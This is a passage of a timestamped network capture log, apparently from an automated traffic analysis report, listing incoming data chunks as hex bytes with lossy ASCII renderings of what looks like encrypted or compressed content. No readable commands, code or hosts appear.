                                                  Data Ascii: |d|(AJI(j?hxl+jXy$:GL$Kf%b-XAOM*&5_V)&/-8>Y<T7T9%hsI,a%"^9gf#7IKt `fldf<|~XZh#idK O@Z28u/E"J
                                                  2021-11-29 14:53:52 UTC48INData Raw: 7d db 2e be a4 6d 3d ce e6 53 9b 3d ec dc 23 71 36 10 33 3d 15 d5 e7 6a b5 a2 fb 10 0f 9e 89 05 b8 b6 44 fd 7d a3 63 f6 fe 20 53 cc 9f fa 71 e2 bc de 37 ef 32 cd 51 89 29 dd 05 1a d6 5a aa 70 82 40 d6 45 22 52 a8 f3 89 91 69 a7 a6 14 4d 14 e9 fb 5a fd c1 69 fb 07 0a 75 cf a7 50 34 3a f9 8a 9f fd 4b 4a 56 d7 98 f6 4d a2 8e 31 83 a7 27 71 12 31 3c 0c f8 08 46 fa b3 3b 36 f8 48 26 30 be 12 21 1b 51 55 b9 73 ca 27 f0 2f da e6 80 44 3a 5e 04 5c c5 84 4b 11 da 15 85 e1 ef 87 b2 49 7e 4a 1c d9 1a f5 a5 8f 02 85 e3 55 37 28 b7 84 95 20 ef b7 45 72 0c 8a 17 38 5b e4 35 e4 35 6f 86 5c 7d f2 03 ff 43 a3 b4 a2 b9 63 ed 11 9f 3b a5 4a 75 b3 55 87 4d 66 f8 81 f1 d0 bb b1 00 7b fc 69 6d 1b 22 64 60 eb 1d 5a 12 49 e6 50 4c 13 ff 66 d3 07 bc 31 60 94 21 5b 3f 09 43 8a fa
                                                  Data Ascii: }.m=S=#q63=jD}c Sq72Q)Zp@E"RiMZiuP4:KJVM1'q1<F;6H&0!QUs'/D:^\KI~JU7( Er8[55o\}Cc;JuUMf{im"d`ZIPLf1`![?C
                                                  2021-11-29 14:53:52 UTC49INData Raw: fd 13 f2 c0 9c c8 17 a2 40 ef d4 e7 45 33 ac ac aa b7 85 86 2a 95 37 73 1d 16 2b 34 61 66 5e 94 f7 20 d1 fd c6 1f 75 20 0a b2 f8 fc 5f 9c 61 cf f4 79 26 8d 62 86 68 95 9b 72 a6 bd 6e 2e 62 b9 10 c4 7c 31 e7 3b ac 34 27 eb f9 8b d3 db 94 dd 01 4f 14 66 bc d3 d0 de 4e 0f ba 85 e8 a5 94 a0 c3 78 9a 94 de 1e 4d d2 39 84 0c f6 85 71 b5 00 d6 d0 28 37 c5 a7 ed 35 14 b5 9f 38 dc 21 e3 20 46 f2 99 42 b9 7c 74 55 dd dc f7 bf f1 4d 05 5a 9a 73 ea 30 65 79 16 13 fa 92 51 f4 bb bc f9 b4 9a 14 1d da 61 f3 b3 b0 05 65 9d 89 71 1c 0f 39 6c 19 1c 8f fe e7 1f 55 f3 9d a3 7d 7c 2f 89 00 88 94 e8 57 d7 dd 74 34 ba c1 9d e9 71 bb b1 c0 7a b5 da 04 db 00 91 1b e2 6a 59 43 2d 1a e0 75 97 fd a8 c3 0a de de e3 d7 83 89 87 7b 84 5e 3f ad 98 68 2f a4 c0 00 41 c0 7d 3f ec b2 28 b5
                                                  Data Ascii: @E3*7s+4af^ u _ay&bhrn.b|1;4'OfNxM9q(758! FB|tUMZs0eyQaeq9lU}|/Wt4qzjYC-u{^?h/A}?(
                                                  2021-11-29 14:53:52 UTC50INData Raw: 8c 7d b4 e9 56 d5 d9 3b 74 9e 11 b9 cb 1d 21 60 68 ea 9c 68 4e a3 a2 37 3f 7c 78 76 42 76 01 6f 9e b8 b5 4b 17 dd 80 ac 08 2a 95 04 de 93 67 78 5b 18 81 ef a2 8a 74 13 13 f2 ce a7 cc 04 b1 29 e2 87 e4 43 5a 4d b5 a8 bd 94 d8 aa e6 15 7b c3 1e 1d 08 47 72 4f 8d 95 2f eb fd c0 7a 83 22 0c 9e e8 f4 4e 8f 0e ec f0 79 3c c0 46 8a 72 93 8a 67 b7 ae 31 0b 7c f5 16 a5 40 33 e7 3c a6 10 06 57 1e 89 d5 b4 d2 df 01 58 76 d8 ad c7 b5 c0 31 9c b0 97 fa 81 2c 32 c3 72 bd 1e 05 6e 71 cb c7 96 3a e1 87 6a dc 5a df f8 e2 e8 d4 a5 ef ae 14 b4 bd 10 40 23 e3 d6 55 5b 21 47 9f 4d 74 55 d7 f3 f0 60 fb 33 db 5a 94 73 fb 34 4d ee 16 8a f2 f9 48 e6 bd 94 38 b7 9a 09 05 1a 60 bb b8 98 ce 0e 9d 83 0f cf 1e b4 4d 0a 1a 87 c5 7d 0e 53 ef a3 29 6e 7a 3e 8c 9b 88 95 dd 46 4d c7 af 44
                                                  Data Ascii: }V;t!`hhN7?|xvBvoK*gx[t)CZM{GrO/z"Ny<Frg1|@3<WXv1,2rnq:jZ@#U[!GMtU`3Zs4MH8`M}S)nz>FMD
                                                  2021-11-29 14:53:52 UTC51INData Raw: 22 4b 18 b4 7a d6 ae 0a 1a 26 12 6d 80 29 e8 f9 12 f1 24 ad e8 a1 bf 74 cf a2 4f 38 af 64 86 99 57 8d 63 f5 e9 8b 94 ab 0f b0 0a 60 9d 81 ab 1b 28 79 35 ce e2 a5 e7 f8 79 40 42 6c d7 63 fb a8 93 3d 77 e9 d0 61 3f 03 4a f4 a8 bf fe d6 9d fd c3 10 9d 2a 86 cb e5 b5 16 fc 0f 85 3e 69 4d 7d 82 b3 17 c7 24 6f 65 fd a9 e3 28 f4 2e 86 7c e8 ec 8c ab de 28 33 ae f0 39 64 ab 6c d9 46 9d f6 2a 93 60 64 b7 c4 fe 52 b7 5f 26 3a 41 9b dd 19 4f 06 95 c2 0e 4f fc 16 4d e1 45 92 43 86 a9 25 c2 7b fa 02 a2 da 2e b4 8b fe 25 a3 49 ee fb 20 79 64 b9 4e 5d 2a ae a1 db a1 12 39 6a 09 88 94 1e df c9 36 16 59 56 c5 82 ad 05 ca 05 2f 16 5c 95 38 b8 38 4a e3 47 9c 44 b5 d4 14 bd d4 53 a7 d6 7b dd d4 96 0d fa b5 c7 e5 14 1b 73 dd 46 0e 2b 2a 48 85 c9 eb 12 ff c9 93 97 dc f1 4e 33
                                                  Data Ascii: "Kz&m)$tO8dWc`(y5y@Blc=wa?J*>iM}$oe(.|(39dlF*`dR_&:AOOMEC%{.%I ydN]*9j6YV/\88JGDS{sF+*HN3
                                                  2021-11-29 14:53:52 UTC52INData Raw: ed e7 0e 53 e5 93 3e 6c 7a 26 9e 9c 99 87 f0 41 4b d6 72 2d ad 46 bc ec 6b ed 2c d1 7c df cc 98 db 75 37 0d 7e 71 55 20 07 86 f1 79 a1 33 37 d2 0a d6 b8 c8 4b 92 85 b5 76 94 c9 f3 b4 86 63 39 e6 c5 23 76 fb 6b a3 f7 a7 33 be de 6b b4 ac bd 43 e0 f1 cf 8a 86 b0 b4 fd 00 2a cc 6a c5 fb a3 e9 ae 66 d9 2e b4 b9 63 7a d4 e4 53 97 5f 62 ce 2d 61 08 1f 0d d5 03 c4 e1 14 33 b2 f6 8c 0b 41 e4 2f ab be 76 59 a4 a0 63 e1 e9 34 73 ff f0 73 7a f5 d5 f0 3e fe 3e cf 5f bb 53 55 04 10 c1 4f 89 bb 87 51 d8 33 ff da a9 f9 fb 90 63 b6 b4 53 d5 14 e9 fb 64 be c1 64 fb 53 08 75 c3 e5 dd 24 30 db 71 8c fd 41 7c 73 a3 ab f2 65 78 9e 3d 94 c4 84 79 7d 13 4a 1e fe 19 51 f8 b0 46 1a eb 40 ae 96 a5 d9 03 72 77 57 92 64 dc 3a d0 ab 39 e6 86 2d 03 55 77 78 c1 95 41 6d c4 05 8f fa 34
                                                  Data Ascii: S>lz&AKr-Fk,|u7~qU y37Kvc9#vk3kC*jf.czS_b-a3A/vYc4ssz>>_SUOQ3cSddSu$0qA|sex=y}JQF@rwWd:9-UwxAm4
                                                  2021-11-29 14:53:52 UTC54INData Raw: 71 ee cc 43 1b 0e e5 58 af d0 e8 2d c3 c0 8c 9b da e2 66 66 cf ef 29 b3 c4 9e 5c e7 8e c2 b3 26 6a bb 38 d7 f7 70 59 4f 11 08 77 8a 0b 28 e9 47 ac 0c 1d 76 94 1d 94 86 27 25 48 80 c1 8b 6c 21 38 8a 66 36 50 5b 4f 5c 65 04 41 1d 7d b5 4d 08 15 a6 cd 21 1d 9f 13 4e b7 a4 43 5b 1e 9e 27 8a c8 0b 38 18 e4 50 e0 fd 04 b1 29 db d0 cf ae 5f 65 aa c5 97 90 b7 6a e0 04 77 72 04 39 20 7a 63 45 e8 5f 07 d3 f7 fa bb a3 dd f5 6a ff f9 44 fa 35 ec f6 78 0c ee 57 8e 1d a8 8a 66 b6 c1 56 0b 60 b3 ca ba 52 24 31 2e b5 31 07 46 f3 05 62 8b c4 21 fe b6 db 77 88 ef 88 ca 4f 05 a3 90 83 37 52 a1 c9 79 9f 35 00 10 55 14 c5 94 38 f1 af 6a da 16 e2 d0 22 e9 d4 a3 c7 63 14 b4 b7 72 dd 23 e3 7c 47 5f 30 55 b7 7c 74 55 dd de f7 66 f0 ee 79 5e 94 73 ea f3 64 7b 16 43 f9 ea 40 e2 b5
                                                  Data Ascii: qCX-ff)\&j8pYOw(Gv'%Hl!8f6P[O\eA}M!NC['8P)_ejwr9 zcE_jD5xWfV`R$1.1Fb!wO7Ry5U8j"cr#|G_0U|tUfy^sd{C@
                                                  2021-11-29 14:53:52 UTC55INData Raw: 2a f4 9a c8 ec 90 b1 38 cb 07 5a c5 83 6f 50 ce 14 8f fd 71 ac 95 61 49 55 0a c0 1b f8 9c a5 1d a1 17 8a 1b 29 ae 9b 6b 31 e3 a6 4b 0c 30 b6 7c c1 bb 3e 0e 5b 36 7e 92 30 ee 0d 02 d9 5a 9a e6 ce 70 65 c5 80 87 05 89 60 e9 b3 4a 95 76 e1 f8 90 e9 a0 18 4e 01 5d 99 ff 66 0c b2 60 03 7c 0b 49 0a 26 7e 43 53 16 12 62 d7 af 94 63 79 f7 b6 48 3f 12 59 84 eb 41 ff f0 47 08 8d 2a a0 0e 94 cb fe b4 04 84 4b 84 12 68 57 5b ab be 8d de fd 72 6f c4 bc c9 39 e6 31 cd b6 e9 c0 87 93 eb 2a 6a ae ef 32 14 b8 6c c8 e8 83 f8 d4 84 4c 63 a1 d7 ee 4d b8 4c 34 3a 50 8f c2 06 b1 c9 b8 cd 1f 8b ec 07 c3 43 7a 63 bd 63 56 3a e3 7b d8 07 b3 cc 30 aa 75 91 09 a9 49 e8 ff f3 52 81 a6 51 4e 38 bf b5 d6 b7 12 39 6a 0b ff 1d c8 d2 dc 2e 00 41 45 c6 87 a4 e9 d5 d7 27 12 75 9e 2b b0 2b
                                                  Data Ascii: *8ZoPqaIU)k1K0|>[6~0Zpe`JvN]f`|I&~CSbcyH?YAG*KhW[ro91*j2lLcML4:PCzccV:{0uIRQN89j.AE'u++
                                                  2021-11-29 14:53:52 UTC56INData Raw: d7 f3 66 f6 81 9a 59 94 79 fc ce 67 24 3a 92 e9 e1 51 e7 2f aa e8 bf 8b 1f b7 bf a8 bb b2 ba 1d d5 f2 66 60 03 15 b8 56 12 0d 9e 77 c9 04 57 e5 8d 50 90 7a 38 95 8d 92 83 e0 56 9d 56 5a 26 a8 5d 8a 80 97 ad 2d db 23 82 b9 89 c1 17 9d 97 68 6a 54 4f 2b 1c 9e ba 89 eb 3e c5 d6 ae 38 f5 4b 98 9c 9d 60 99 d3 3e bc 51 f9 2f 29 da 17 4e db bd 39 92 7d 37 b8 df 5b 56 c3 52 49 3d f2 dd 8c f5 ec 8a fd 06 33 f5 a3 c3 94 6c fe c1 51 c3 1f 90 a4 7a 1d 0a cd 51 9d 54 7a cc 32 71 74 36 37 17 05 d5 f0 14 38 cc dd 14 18 42 8b 02 83 b2 78 71 7b cc 49 e5 f8 37 5d ca e1 1c 64 e3 ba c7 2f ee 23 0a 4a 83 57 44 15 0d ee 54 5e 9e 7b 40 d7 4b 9b c8 a0 e2 86 93 70 88 0c c1 3d ea 37 e4 52 9d e7 62 d3 82 18 67 b6 30 6f 25 3a dc 2d a6 fd 41 6d be a6 bc de 44 8e 9d 7c 8e ab 36 78 7d
                                                  Data Ascii: fYyg$:Q/f`VwWPz8VVZ&]-#hjTO+>8K`>Q/)N9}7[VRI=3lQzQTz2qt678Bxq{I7]d/#JWDT^{@Kp=7Rbg0o%:-AmD|6x}
                                                  2021-11-29 14:53:52 UTC58INData Raw: c8 d8 c0 15 e2 5d 56 de af 92 fb cb 23 35 3b 63 92 10 8f 34 53 fa 6f 97 26 0a cb 1f 49 de a2 76 df 6a d9 fb ed 25 a6 b5 d8 ef 0a 17 5b 2f 40 11 24 fc ad aa c1 eb 2d 74 c3 8c 9b dc f0 47 0a 28 ec 23 a2 76 51 b4 e4 88 ec fb 30 42 f9 2a d1 f4 4e 2b 64 12 0f 5f 65 20 b4 ef 6f fb 63 3b 72 87 13 b6 9d 2a 24 60 6a ea 96 6e 4e a3 a2 3b 3c 7c 78 4d 5d 7d 29 77 f5 7e b3 63 02 07 8e 8f 08 40 95 04 d2 93 5e 48 73 36 89 31 a4 9a 22 16 12 f2 c0 99 f5 55 c2 0d c8 d6 e1 50 55 74 a5 bb b9 ba 52 6f e6 13 60 1b 38 1f 20 70 78 20 af 9a 07 d5 ec c9 61 55 4d 2e b6 e9 ee 5f 86 1f eb 99 5f 22 e2 40 95 61 bb aa 62 b7 a8 6e 21 62 b9 10 ad 4b 3a 88 29 bc 20 05 89 f5 ae fd 83 be df 0b 5a 0f 4a 95 c7 bf c0 91 0f 6e 82 d5 a5 65 a1 c3 78 a4 06 73 aa 5f ca cd 99 3a ce 85 6a d0 89 d4 d6
                                                  Data Ascii: ]V#5;c4So&Ivj%[/@$-tG(#vQ0B*N+d_e oc;r*$`jnN;<|xM]})w~c@^Hs61"UPUtRo`8 px aUM.__"@abn!bK:) ZJnexs_:j
                                                  2021-11-29 14:53:52 UTC59INData Raw: 36 07 df 12 c2 41 67 61 06 ab fc 59 b0 89 15 31 ab 36 72 55 08 3e 0c f4 0a 4d fa bc 7c 8e fa 48 2a 3e a2 2b c2 75 77 5d a8 73 01 3c 02 9c f6 f7 81 03 8c 5c 04 50 dc 85 6f 97 cf 14 8f 3d 2e b1 ca bb 5a 4f 14 c2 0c d0 67 b6 02 8f 65 d4 37 39 be bb 70 32 e7 ac 41 72 1c a3 aa d4 a2 0a 1b 58 3f 51 be d0 06 0c 0b dd d7 8b ea ab b3 bb d7 a2 a8 3b af 68 c1 9d 57 8d 63 f9 d0 b9 fb bf 04 6e 00 77 b9 ee 6c 5a 34 73 0f 63 1c 5a 18 26 6f 51 4c 63 ed 63 fb d3 be 31 66 f5 a5 5a 3f 19 4b 9b fe a4 ce db 41 25 d7 35 b5 63 86 cb fe a4 11 8d a3 ea df 62 46 5f a5 ec 24 c5 f8 7a 0c df af c9 22 fe 28 ef d4 e8 ec 84 83 b8 29 6a a4 fd 4a 21 ab 6c d3 e9 9a e7 2c 91 48 4c b3 c4 f8 45 3a 58 26 3a 40 8e d5 08 47 de ea a6 0e 9b f9 b4 5c fc 51 86 6b 55 a8 25 c9 79 cc 13 8a f7 2b b4 8d
                                                  Data Ascii: 6AgaY16rU>M|H*>+uw]s<\Po=.ZOge79p2ArX?Q;hWcnwlZ4scZ&oQLcc1fZ?KA%5cbF_$z"()jJ!l,HLE:X&:@G\QkU%y+
                                                  2021-11-29 14:53:52 UTC60INData Raw: 52 a7 c9 7b 9f 4f 04 10 59 e2 e9 90 12 f0 ad 8f db 57 dc f8 be eb d4 a9 d4 33 1d 9c 20 3b dc 25 cb f2 44 5f 36 6b 52 7d 74 5f f5 42 f7 66 fa fd 7d 5e bc 83 e9 30 63 53 38 88 f8 ec 68 12 b4 bc f3 9c 06 0f 2d da 72 bc b4 98 92 0c 9d 8f 48 2d 1d b4 41 31 f9 8f ed eb 26 cf e5 8b 35 7f 7f 29 99 b4 b7 90 f0 47 5d e4 5c 2d ac 57 9a 11 6a bc 2a f9 52 ac cc 9e dc 2e a3 0d 7e 71 49 a0 3a d9 dd 74 9d e7 e9 75 0c c1 d7 e4 4d ba a1 9a 71 94 d4 06 85 87 63 33 2e ff 46 2d ee 69 a3 fb a7 3f a9 dd 6b db ae bd 4f 52 d0 cc 8a 80 df 80 ec 06 4f c0 b0 c6 fd b4 f6 d0 5f f1 2c bf b5 6d 7a 43 e7 53 9b 43 63 f5 60 73 1b 14 5a 3d 01 c4 e7 02 2c ab 94 02 19 44 90 cd fe cd 5e 73 7d a5 70 ee e9 38 73 8c f2 73 76 8d 92 cf 3e f8 25 d5 48 94 29 70 06 1a d6 58 a8 70 81 79 dc 5d 4d dd c6
                                                  Data Ascii: R{OYW3 ;%D_6kR}t_Bf}^0cS8h-rH-A1&5)G]\-Wj*R.~qI:tuMqc3.F-i?kORO_,mzCSCc`sZ=,D^s}p8ssv>%H)pXpy]M
                                                  2021-11-29 14:53:52 UTC61INData Raw: 65 ff 49 61 c0 36 b0 41 9c af 36 ce 79 c7 0f cd f6 2d b4 8d 81 28 b2 5c 97 cc 27 41 97 a8 43 5a 45 99 a6 c4 ad fd 35 6e 48 85 8e ce bd fc 3f 05 5a 50 c5 8a da ef ca 29 2c e0 67 b2 10 89 34 53 fa 51 92 26 0a cb 1f 49 d8 57 93 df 6a d3 34 d1 1c eb a2 0e fa 16 0f 62 dd 51 9f 95 eb 91 57 3e 12 14 2f d4 5a 8e c9 e5 48 33 de d1 a8 5a a1 49 69 f1 ab ec 91 30 42 f5 2a d8 8e dc c3 67 18 04 5f b4 23 b4 e3 99 a4 65 11 7d be 1b bf f4 02 20 60 6c c2 8b 6a 8b a5 8a 66 e1 7c 7e 5e f8 75 01 69 e4 7e b5 4b 07 03 8e 88 20 1d 95 04 86 9f 4f 40 dc 19 8b 31 7b 8d 0a 38 07 f2 ca 8f c1 06 b1 2e d9 e6 e4 43 ab 65 ac aa 39 92 b7 7d f0 06 77 25 da 38 20 70 72 5e 81 84 f9 d2 d1 c5 5b 51 3f 19 b2 e9 f9 48 90 04 12 f7 55 29 eb 57 81 5a dc 95 6d a4 a8 01 1a 66 a6 1f 55 5b 1f ef 34 aa
                                                  Data Ascii: eIa6A6y-(\'ACZE5nH?ZP),g4SQ&IWj4bQW>/ZH3ZIi0B*g_#e} `ljf|~^ui~K O@1{8.Ce9}w%8 pr^[Q?HU)WZmfU[4
                                                  2021-11-29 14:53:52 UTC63INData Raw: e1 0d 40 48 94 5d 74 82 1a d0 49 3d 70 83 4d fe 87 4d db a9 6f 9e 85 7e 96 3d 3c c2 15 75 e0 70 ab cf 13 4f 99 0c 6a cc aa cc 25 30 d1 99 8f fa 5e 6d 40 1d ba f4 4d 38 8c 3a 8d a0 16 9e 7d 19 3e 90 ef 1e 55 e7 a7 07 8e eb 4f 3f 2c ad 79 b7 65 70 48 b7 55 4e 2b d8 83 45 f7 81 34 1f 43 78 c6 d2 92 58 6e d8 88 94 ec 2e 99 81 fd 58 4d 03 c1 1f 64 9c b0 1d 96 ff 17 26 3e a0 87 55 af f6 a1 52 76 0c 28 6d c0 bb 0d 3d b6 36 6f 80 b3 e8 f4 1c e2 5d 17 fb a6 a6 7d d3 16 8e 3c b0 7b c9 33 55 8d 65 6f e9 86 e4 a5 18 2c 11 76 8c f5 7a 87 39 74 10 7f 0a c6 09 21 70 4c 6c 99 ec 63 fb 35 ae 36 79 f9 85 da 3f 03 4b 07 ee b8 e1 c3 57 bf c7 32 aa 3d a6 34 ef a6 1b 13 a4 82 21 42 50 c9 ab b4 08 ef ec f1 72 d0 b1 ea 3e 68 3f c0 57 cc cc 0e ab de 28 f6 bf f7 26 22 bc f0 c8 fd
                                                  Data Ascii: @H]tI=pMMo~=<upOj%0^m@M8:}>UO?,yepHUN+E4CxXn.XMd&>URv(m=6o]}<{3Ueo,vz9t!pLlc56y?KW2=4!BPr>h?W(&"
                                                  2021-11-29 14:53:52 UTC64INData Raw: e6 46 82 07 23 8b 66 bd 0c 10 12 78 c7 2a ab 5a 39 cf 65 b9 20 09 38 4a 8a d5 be 1c ce 18 50 7b 5e ad c7 b5 e2 16 0b b0 91 9f 3d 53 a1 c9 d0 a6 14 0c 18 4c db d1 81 02 ce 5b 68 da 57 c7 c1 33 fb 4e ae ce 0c d8 b6 b7 38 d5 4c 52 dd 46 55 23 50 a1 6f 66 6d 6c dc f7 66 e1 fd 68 4a 0e 60 ee 39 74 7f 79 3a f9 ea 4a e4 b0 cf 98 b5 9a 05 3e d6 70 be 9a ea 01 0f 9b e6 d2 02 1f be 53 e7 1d 98 13 e0 1f 56 cd d0 3b 6c 7c 57 2d 9d 99 98 e4 bf 4a da 8c 2c bd 58 a4 b3 6f ad 2b be ce af cc 92 de f8 8c 1b 80 7a 3f 4f 3e ae ac 77 89 ed 5b 60 0d c1 dd e1 b5 93 99 66 70 f2 d3 2b 83 d9 67 39 3e be b4 5f cc 61 b7 03 b5 21 46 d4 23 d3 95 ab 4b 3d f8 bd a8 84 ce 8e ee 0a 3a 69 a7 c6 fb a4 ed db 4a c3 38 96 ee 6f 15 63 47 42 87 45 43 81 27 77 1d b0 24 0d 1b ec bc 01 3d a5 59 07
                                                  Data Ascii: F#fx*Z9e 8JP{^=SL[hW3N8LRFU#PofmlfhJ`9ty:J>pSV;l|W-J,Xo+z?O>w[`fp+g9>_a!F#K=:iJ8ocGBEC'w$=Y
                                                  2021-11-29 14:53:52 UTC65INData Raw: f2 e3 f8 4a 5d e8 ec 8f b8 da 21 e4 19 e6 08 2c bc 65 57 4d 8b 2c 39 9b 73 6e 9c dd ef 56 a6 55 2f 2b 4b 07 f5 70 4b c8 92 ea 2a 9b fd 1c ef e5 4f 85 95 8f a3 34 c9 79 d4 36 43 d6 a1 03 9d a1 12 b5 4b f3 e1 ab f6 80 bd c0 ea 3d 65 b7 db b8 e0 13 59 10 85 9f c4 da c7 36 9f 74 3c d0 87 b3 d3 ef 29 26 34 d0 86 33 a9 e2 40 fb 53 90 42 66 d8 13 52 d9 6e b4 ee b1 aa 05 e9 0d f0 a6 d1 f8 03 0d 52 da 50 31 1a 66 4c a9 c1 fc 24 38 e3 16 8e da e5 5b 3b d9 f6 50 54 5f b6 bd f7 9f d5 b7 24 6a 7e 3b d7 fb 70 4e 60 12 09 76 98 37 a0 c1 e4 a6 63 31 5c ce 1b bf bf ba 1f 60 6c c3 98 78 5f b7 9d ea 03 7c 7e 5f 72 cc 01 69 fb 56 ef 4b 1d 09 99 5f ad 36 95 04 d5 8c 41 56 48 15 9d 22 b1 a4 24 3a 12 f4 d9 80 cd 15 a5 5c e8 d4 e7 45 4f 75 bd bb a9 ba dc 68 e6 13 68 90 17 38 20
                                                  Data Ascii: J]!,eWM,9snVU/+KpK*O4y6CK=eY6t<)&43@SBfRnRP1fL$8[;PT_$j~;pN`v7c1\`lx_|~_riVK_6AVH"$:\EOuhh8
                                                  2021-11-29 14:53:52 UTC66INData Raw: b9 61 a9 01 71 99 d7 a8 1b 28 73 1e 75 03 53 ce 35 78 40 58 0f df 32 ea bf a7 e7 75 f0 8e 13 2e 13 58 bc ee 98 ef fb 2e 04 d4 35 b3 0c 88 dc 62 a1 1b 8f b4 96 1c 72 64 43 ab a4 9b f2 fa 6d 62 75 bf eb 3c dc 85 c7 48 e2 c4 d4 ab de 22 42 44 f1 39 0d 82 b8 d8 fa 96 de 0e 85 60 6e d8 ec fc 52 b1 4e 31 2d 97 8e ca 08 41 df 19 c5 0e 9b fc 05 6b e5 63 84 52 8b 25 1a c3 68 cb a5 b3 f8 3b 9c 20 90 25 a9 47 d8 64 1a 41 91 b8 58 75 87 bf a4 ce 87 c3 29 48 16 0c 89 c8 d2 d7 2e 26 4d 75 c2 96 a2 77 f4 29 26 3f d0 86 1b aa 1c f8 f0 42 96 4a cf 47 20 43 d5 7e bd f7 98 d8 ea e2 37 a6 4a 27 16 10 0d 60 dd 54 02 34 ec cc ab c1 ed 14 26 eb c2 99 cf f2 21 3b cf ef 29 89 4f a7 b8 cc de c0 a6 36 2d e6 38 d7 f7 5f 07 67 12 09 66 9a 3c bd 3f 54 be 72 2f 62 a7 4a ae a3 2e f6 73
                                                  Data Ascii: aq(suS5x@X2u.X.5brdCmbu<H"BD9`nRN1-AkcR%h; %GdAXu)H.&Muw)&?BJG C~7J'`T4&!;)O6-8_gf<?Tr/bJ.s
                                                  2021-11-29 14:53:52 UTC67INData Raw: 5e 31 8e e7 62 85 e3 ba 65 04 4f 60 dd 5a 93 8f 92 65 9e d3 22 a7 93 70 35 31 5f b1 56 42 dc 93 39 bd b9 0f c2 99 9b 7a 30 76 3d f8 cf 99 83 d9 81 73 b7 37 3e a1 d7 e8 a8 d5 d9 4a dc 3f b3 a2 b1 1c 74 e8 c7 95 43 66 ca f9 e3 7a 8c 24 1a 14 12 f2 08 2c ae ea 07 29 a6 8b 16 25 09 6b ab 6a 75 ee d8 f8 31 5a c8 f6 65 61 e7 34 7a 26 24 27 ce 4a 9d 6d 06 15 1f c1 47 35 70 80 40 d0 c8 97 cd 86 eb 9e 84 72 b8 be 39 d3 1b 7d d1 88 b5 d0 62 05 99 0f 64 cb 1e b5 bb 1b c1 14 98 ec 4f 76 65 b5 b4 60 5c a0 8c 33 06 71 a8 7e 6c 1f 2f 02 6a 31 a0 ea b8 5e 3a 2e 49 20 2b 9a 27 2b 74 7d 5d a8 7b cc fd cb 8d c8 e8 97 39 21 f4 da 55 e6 bd 70 7e ce 1e 96 e4 19 b0 97 61 43 94 1c d5 23 f8 cc ab 02 85 e9 8b 37 39 b9 93 43 33 f7 a4 4d 63 0c b6 7c c7 ab 1b 1d 49 2c 6f 80 2e e2 c3
                                                  Data Ascii: ^1beO`Ze"p51_VB9z0v=s7>J?tCfz$,)%kju1Zea4z&$'JmG5p@r9}bdOve`\3q~l/j1^:.I +'+t}]{9!Up~aC#79C3Mc|I,o.
                                                  2021-11-29 14:53:52 UTC68INData Raw: 65 9c be 5f 9d 22 b4 e3 56 a0 72 33 1b b6 1a bf bf 25 24 13 4a c3 8b 60 5d ac 9b 6f 2b 13 57 5f 5a 7e 10 60 e6 11 9f 4a 1d 09 91 91 ad 36 95 04 d5 8c 45 5e d6 33 8b 31 a3 9f 0f 31 03 f8 c3 01 6c 2e 91 2e ca dc f6 47 4a 74 a6 a3 33 25 a9 44 f7 14 71 17 01 3c 3e 61 77 59 99 b0 16 d2 fd ca 61 54 33 00 db ce e9 4e 85 1f e5 e7 7c 4f ca 47 84 62 82 83 09 9c af 01 01 6b be 15 bd 59 bd 50 52 91 21 0f 5d e9 8c fd a1 bf df 0b 58 02 0d ba c6 bf c0 43 07 ba 49 e5 a8 7a 96 c3 72 bd 1e 0b 38 71 c8 c7 94 18 de bd 6a da 5d 08 d0 24 c1 d4 a3 86 29 14 b4 b7 38 dc 23 e3 dc 46 5f 07 42 b7 7c 43 54 dd de e2 66 f0 ee 63 58 94 72 f1 00 63 7b 77 8a f8 ea d0 f7 b5 ad 8a d5 9b 0f 27 dd 68 d4 47 b1 05 05 8e 8f 62 2b 79 b5 47 13 0f 8b fc e7 1f 56 f3 9a 3a e2 cd 57 69 9d 99 98 fb 46
                                                  Data Ascii: e_"Vr3%$J`]o+W_Z~`J6E^311l..GJt3%Dq<>awYaT3N|OGbkYPR!]XCIzr8qj]$)8#F_B|CTfcXrc{w'hGb+yGV:WiF
                                                  2021-11-29 14:53:52 UTC70INData Raw: 43 11 e2 a6 4d f6 1a b4 6d b4 1e 1b 1d 43 3c 1c 7b 2e f9 f9 0f fd 63 f6 ee a1 bf 4d bb 8e 9f 3d 87 f5 ea b3 53 fe 99 f2 f8 8b 94 42 0f b0 0a 79 bb 91 68 1b 2e 5b 8f 67 1c 5c 30 b1 6c 51 4a 6a 10 62 fb a3 d0 cc 67 e7 af 52 17 7e 4f 9b f9 97 7f d8 41 25 fe a2 b6 1d 80 b8 13 a7 1b 85 da 78 3f 63 4c 5d 92 cc 13 cd fc 45 e1 d3 ae cf 00 63 2d c7 4e 9b 10 8f ab d4 47 97 af f0 33 0f 82 ef dd fa 9a de ae 81 60 62 9f 53 fd 52 b1 2c da 3b 41 97 b2 e4 4e c8 9e ca 26 18 f9 16 4b dc c1 96 43 9a 81 a0 c7 68 cc 74 5e df 2f be e4 6d 24 a3 52 f0 c0 a3 45 91 bf 66 d9 2e bf a2 ec 2c e8 38 40 72 7d 8f c8 d8 b9 c0 04 5c 5c dc af 3d ff cb 2f 0e b7 76 97 3e 96 a3 50 f0 44 ef a9 b1 cb 15 2c 28 7e ab d5 7c d1 85 16 0c fa bf cf 33 14 0c 60 c8 7b 36 23 d4 49 d7 3e ec 05 23 cb 9d 99
                                                  Data Ascii: CMmC<{.cM=SByh.[g\0lQJjbgR~OA%x?cL]Ec-NG3`bSR,;AN&KCht^/m$REf.,8@r}\\=/v>PD,(~|3`{6#I>#
                                                  2021-11-29 14:53:52 UTC71INData Raw: b8 e6 0d 84 fa 37 1d 59 f4 81 2e 7f 44 66 61 63 66 94 da 41 4b cd 62 2d ac 5d 8c da 6a 63 2e d3 70 b4 cc 98 cb 15 bd 0b 7e 54 5d 5e 3b 10 f1 73 98 fd 27 da 34 d4 d5 f5 4b 92 9e 90 6e 9d 3c 2f 87 df 72 3d 29 d7 0f 4f ca fa b4 a2 a9 55 b1 c4 45 1d b4 e2 52 5f 98 c7 9b 80 5f 92 a2 19 42 84 bb d7 fd 34 e0 9e 4c bb 4e b7 a4 6d 84 7a f5 0c 8a 31 0b d4 32 71 8a 0d 15 48 1a a7 81 0c 2c a5 6a 09 58 1b 81 70 cb b7 6d 77 ec 83 e3 e7 f8 31 04 c6 93 13 c4 7e a5 dd 2d f6 34 cd 51 8c 4a aa 05 36 c2 4b 2f d6 93 8b c9 8a c0 f0 a9 f3 8e 91 66 a9 a2 2f ca 15 f8 f9 68 a3 2e 63 ff 85 03 7c d1 e5 6b 27 30 db 0f 81 ea 52 6f 60 b5 b2 eb 46 